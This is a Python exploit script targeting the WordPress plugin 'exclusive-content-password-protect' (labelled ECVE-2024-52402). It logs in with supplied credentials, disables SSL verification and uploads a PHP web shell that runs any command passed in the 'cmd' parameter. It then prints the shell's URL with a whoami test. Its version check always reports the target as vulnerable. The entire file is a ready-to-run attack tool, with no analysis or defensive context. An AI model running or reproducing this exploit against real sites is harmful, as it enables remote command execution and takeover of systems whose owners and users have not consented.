import requests
import argparse
import re

# Nxploit, Khaled ALenazi 

# Disable SSL warnings
requests.packages.urllib3.disable_warnings()

class WordPressExploiter:
    def __init__(self, url, username, password):
        self.url = url
        self.username = username
        self.password = password
        self.user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
        self.session = self._initialize_session()

    def _initialize_session(self):
        session = requests.Session()
        session.verify = False  # Ignore SSL verification
        return session

    def get_plugin_version(self):
        readme_url = f"{self.url}/wp-content/plugins/exclusive-content-password-protect/readme.txt"
        response = self.session.get(readme_url, headers={"User-Agent": self.user_agent}, verify=False)
        
        if response.status_code == 200:
            match = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", response.text)
            if match:
                return match.group(1)
        return None

    def is_potentially_vulnerable(self, version):
        # This method is kept for any future version checks, but currently, it always returns True
        return True

    def login_to_wordpress(self):
        login_url = self.url + "/wp-login.php"
        login_data = {
            "log": self.username,
            "pwd": self.password,
            "rememberme": "forever",
            "wp-submit": "Log In"
        }
        response = self.session.post(login_url, data=login_data, headers={"User-Agent": self.user_agent}, verify=False)
        return any("wordpress_logged_in" in cookie.name for cookie in self.session.cookies)

    def upload_web_shell(self):
        exploit_url = f"{self.url}/wp-admin/admin.php?page=1.1.0%2Fcontent-password-protect.php"
        shell_filename = "nxploit.php"
        shell_code = """<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"""
        files = {
            "userfile": (shell_filename, shell_code, "application/x-php")
        }
        headers = {
            "User-Agent": self.user_agent,
            "Referer": exploit_url
        }
        response = self.session.post(exploit_url, files=files, headers=headers, verify=False)
        
        if response.status_code == 200:
            return f"{self.url}/wp-content/uploads/{shell_filename}"
        return None

def main():
    parser = argparse.ArgumentParser(description="Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi ")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    args = parser.parse_args()

    exploiter = WordPressExploiter(args.url, args.username, args.password)
    
    version = exploiter.get_plugin_version()
    if version:
        print(f"[+] Plugin version detected: {version}")
        if exploiter.is_potentially_vulnerable(version):
            print("[!] Attempting exploitation...")
        else:
            print("[X] Site is not vulnerable. Exiting.")
            return
    else:
        print("[X] Could not determine the plugin version. Proceeding with exploitation attempt...")

    if exploiter.login_to_wordpress():
        print("[+] Logged in successfully.")
    else:
        print("[X] Failed to log in.")
        return

    shell_url = exploiter.upload_web_shell()
    if shell_url:
        print(f"[!] Exploit completed! Web Shell uploaded: {shell_url}")
        print(f"[*] Test with: {shell_url}?cmd=whoami")
    else:
        print("[X] Exploit failed. Check manually.")

if __name__ == "__main__":
    main()